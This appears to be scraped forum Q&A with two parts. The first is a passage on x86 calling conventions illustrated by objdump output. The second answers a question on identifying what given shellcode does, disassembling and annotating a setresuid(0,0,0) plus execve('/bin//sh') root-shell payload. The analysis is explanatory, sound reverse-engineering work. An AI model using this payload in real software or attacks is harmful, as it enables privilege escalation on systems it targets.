1f: 83 c0 07 add $0x7,%eax
22: c3 retq
now edi and esi are used. all looking like it is the calling convention to me...
a string
extern unsigned int more_fun ( const char * );
unsigned int fun ( void )
return(more_fun("Hello World")+7);
0000000000000000 <fun>:
0: 48 83 ec 08 sub $0x8,%rsp
4: bf 00 00 00 00 mov $0x0,%edi
9: e8 00 00 00 00 callq e <fun+0xe>
e: 48 83 c4 08 add $0x8,%rsp
12: 83 c0 07 add $0x7,%eax
15: c3 retq
eax is not prepped as in printf, so perhaps eax has something to do with the number of parameters that follow, try putting more parameters on your printf and see if eax going in changes.
if I add -m32 on my command line then edi is not used.
00000000 <fun>:
0: 83 ec 18 sub $0x18,%esp
3: 68 00 00 00 00 push $0x0
8: e8 fc ff ff ff call 9 <fun+0x9>
d: 83 c4 1c add $0x1c,%esp
10: 83 c0 07 add $0x7,%eax
13: c3
I suspect the push is a placeholder for the linker to push the address to the string when the linker patches up the binary, this was just an object. So my guess is when you have a 64 bit pointer, the first one or two go into registers then the stack is used after it runs out of registers.
Obviously the compiler works so this is conforming to the compilers calling convention.
extern unsigned int more_fun ( unsigned int );
unsigned int fun ( unsigned int x )
0000000000000000 <fun>:
0: 48 83 ec 08 sub $0x8,%rsp
4: 83 c7 05 add $0x5,%edi
7: e8 00 00 00 00 callq c <fun+0xc>
c: 48 83 c4 08 add $0x8,%rsp
10: 83 c0 07 add $0x7,%eax
13: c3 retq
correction based on Peter's comment. Yeah it does appear that registers are being used here.
And since he mentioned 6 parameters, lets try 7.
extern unsigned int more_fun
unsigned int,
unsigned int,
unsigned int,
unsigned int,
unsigned int,
unsigned int,
unsigned int
unsigned int fun (
unsigned int a,
unsigned int b,
unsigned int c,
unsigned int d,
unsigned int e,
unsigned int f,
unsigned int g
0000000000000000 <fun>:
0: 48 83 ec 10 sub $0x10,%rsp
4: 83 c1 04 add $0x4,%ecx
7: 83 c2 03 add $0x3,%edx
a: 8b 44 24 18 mov 0x18(%rsp),%eax
e: 83 c6 02 add $0x2,%esi
11: 83 c7 01 add $0x1,%edi
14: 41 83 c1 06 add $0x6,%r9d
18: 41 83 c0 05 add $0x5,%r8d
1c: 83 c0 07 add $0x7,%eax
1f: 50 push %rax
20: e8 00 00 00 00 callq 25 <fun+0x25>
25: 48 83 c4 18 add $0x18,%rsp
29: 83 c0 11 add $0x11,%eax
2c: c3 retq
and sure enough that 7th parameter was pulled from the stack modified and put back on the stack before the call. The other 6 in registers.

How can I check the commands the given shellcode executes?

Lets say I'm given the following shellcode:
char shellcode[]=
How can I check what it means / the ASM instructions it represents?
Thanks :)
Compile and disassemble it! For your example:
$ cat example.c
char shellcode[]=
$ make example.o
cc -c -o example.o example.c
$ objdump -D example.o
example.o: file format elf64-x86-64
Disassembly of section .data:
0000000000000000 <shellcode>:
0: 31 c0 xor %eax,%eax
2: 31 db xor %ebx,%ebx
4: 31 c9 xor %ecx,%ecx
6: 99 cltd
7: b0 a4 mov $0xa4,%al
9: cd 80 int $0x80
b: 6a 0b pushq $0xb
d: 58 pop %rax
e: 51 push %rcx
f: 68 2f 2f 73 68 pushq $0x68732f2f
14: 68 2f 62 69 6e pushq $0x6e69622f
19: 89 e3 mov %esp,%ebx
1b: 51 push %rcx
1c: 89 e2 mov %esp,%edx
1e: 53 push %rbx
1f: 89 e1 mov %esp,%ecx
21: cd 80 int $0x80
Note the use of objdump's -D flag to disassemble all sections, rather than just what it thinks the executable sections are.
As for what this code means, I guess we can break it down piece by piece (from above, with inline comments):
// NOTE(review): presumably 32-bit code (it uses int $0x80 with 32-bit pointers);
// objdump decoded it as 64-bit, which is why the pushes and pops show r-registers.
xor %eax,%eax // clear eax register
xor %ebx,%ebx // clear ebx register
xor %ecx,%ecx // clear ecx register
cltd // clear edx register (via sign-extension of eax,
// which is 0 here) - a one-byte way of zeroing edx
mov $0xa4,%al // put 0xa4 (decimal 164) into eax
int $0x80 // do system call. Syscall 164 is "sys_setresuid"
// - it takes three parameters, in ebx, ecx, and edx,
// so in this case, it's calling sys_setresuid(0, 0, 0);
pushq $0xb // push constant 0xb (decimal 11) to the stack
pop %rax // pop it back into rax
push %rcx // push the 0 in rcx to the stack (terminates the string pushed next)
pushq $0x68732f2f // push constant to the stack (ASCII "//sh")
pushq $0x6e69622f // push constant to the stack (ASCII "/bin")
mov %esp,%ebx // ebx = pointer to the string "/bin//sh" now on the stack
push %rcx // push rcx again, it's still 0
mov %esp,%edx // edx = pointer to this 0 (an empty environment list)
push %rbx // push rbx, the pointer to "/bin//sh" (it is not 0)
mov %esp,%ecx // ecx = pointer to the array { pointer to "/bin//sh", 0 }
int $0x80 // system call again - this time, it's call 11, which is
// sys_execve. It takes a pointer to a filename to execute (ebx)
// and two more pointers, to the arguments (ecx) and the
// environment (edx) to pass
So this code first calls:
sys_setresuid(0, 0, 0)
To give itself root privileges, and then calls sys_execve() to start running /bin/sh, giving a shell prompt.
